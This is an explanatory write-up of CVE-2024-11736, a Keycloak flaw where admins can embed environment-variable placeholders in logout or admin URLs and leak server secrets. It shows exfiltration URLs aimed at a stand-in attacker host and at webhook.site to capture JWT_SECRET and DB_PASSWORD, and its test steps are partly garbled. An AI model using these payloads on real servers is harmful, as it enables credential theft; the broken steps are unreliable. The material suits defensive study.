CVE-2024-11736 - How Keycloak’s URL Placeholders Expose Sensitive Server Data

CVE-2024-11736 is a recently discovered security vulnerability in Keycloak, a popular open-source identity and access management solution. This issue could let admin users access sensitive server environment variables and system properties through user-configurable URLs, such as backchannel logout URLs and admin URLs.

Let’s break down what this means, how it works, and what you can do to stay safe.

What’s the Vulnerability?

Keycloak allows you to configure certain URLs—like backchannel logout URLs or admin URLs—with placeholders. These placeholders look like ${env.VARNAME} or ${PROPNAME}.

During processing, the server replaces these with the actual values of the server’s environment variables or system properties. This means a user with admin privileges could intentionally set up a URL to read sensitive configuration details, like database passwords or secret keys.

Example Scenario

Suppose you have an environment variable called DB_PASSWORD. If an admin sets a backchannel logout URL as:

https://example.com/logout?pw=${env.DB_PASSWORD}

When Keycloak processes this URL, it will substitute ${env.DB_PASSWORD} with the real database password, resulting in a request to:

https://example.com/logout?pw=supersecretpassword

This approach is particularly risky if URLs are logged or communicated to less trusted systems, potentially exposing sensitive data.

Who’s Affected?

- Keycloak administrators: If you have admin access to Keycloak’s administrative console, you may be able to exploit this issue.
- All Keycloak deployments: Any system running a vulnerable version of Keycloak and allowing admin configurable URLs is at risk.

Private server configuration data

Unintentional exposure of these values could lead to attackers accessing databases, external APIs, or internal system functions.

Exploit Details

Let’s say someone with admin privileges wants to extract the JWT_SECRET environment variable. They could set a backchannel logout URL as follows:

https://attacker-site.com/collect?secret=${env.JWT_SECRET}

When a logout event occurs, the server will construct the URL, replacing ${env.JWT_SECRET} with the real value, like so:

https://attacker-site.com/collect?secret=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9

The attacker’s service at attacker-site.com receives this request and logs the secret.

Here’s a simplified example in pseudo-code showing how substitution happens

String urlTemplate = "https://example.com/logout?pw=${env.DB_PASSWORD}";
String envVar = System.getenv("DB_PASSWORD");
String finalUrl = urlTemplate.replace("${env.DB_PASSWORD}", envVar);
// Sends: https://example.com/logout?pw=supersecretpassword

`

https://webhook.site/?secret=${env.DB_PASSWORD}

Trigger an event (like user logout) in Keycloak.

4. Check your webhook.site endpoint to see if the secret got leaked.

Original References

- Keycloak Security Advisory: CVE-2024-11736
- NIST NVD: CVE-2024-11736 Summary
- Red Hat Security Advisory

Is This a Remote Code Execution?

No, this isn’t RCE by itself. The attacker needs admin access to configure URLs. However, it drastically reduces the effort needed to steal secrets if an attacker gets admin through some other vulnerability or phishing.

How to Fix

Keycloak has released patches in later versions to restrict what can be used in URL placeholders. Upgrade to the latest supported Keycloak version as soon as possible.

Conclusion

CVE-2024-11736 highlights how features meant for configurability—like template variables in URLs—can backfire if not properly sandboxed. Even with trusted admins, security through obscurity isn’t enough. Always keep your components up to date and review administrative privileges often.

If you want to learn more or need help patching your Keycloak instance, check out the official advisory and community discussions. Stay safe!

Timeline

Published on: 01/14/2025 09:15:20 UTC
Last modified on: 01/15/2025 05:38:20 UTC